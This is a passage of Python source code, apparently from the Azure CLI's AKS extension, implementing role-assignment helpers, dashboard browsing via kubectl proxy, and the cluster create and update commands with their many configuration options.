f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
msi_client = get_msi_client(cli_ctx)
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
resource_group_name = match.group(2)
identity_name = match.group(3)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError("Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
cmd.cli_ctx.cloud.endpoints.portal + # Azure Portal URL (https://portal.azure.com for public cloud)
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_encryption_at_host=False,
no_wait=False,
yes=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
enable_encryption_at_host=enable_encryption_at_host,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
service_principal_profile = None
principal_obj = None
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
if not enable_managed_identity:
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
from knack.prompting import prompt_y_n
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper,
aci_subnet_name,
vnet_subnet_id
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError('"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError('--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if private_dns_zone:
if not enable_private_cluster:
raise CLIError("Invalid private dns zone for public cluster. It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
disable_pod_identity=False,
yes=False,
tags=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not tags:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--tags"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError('Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
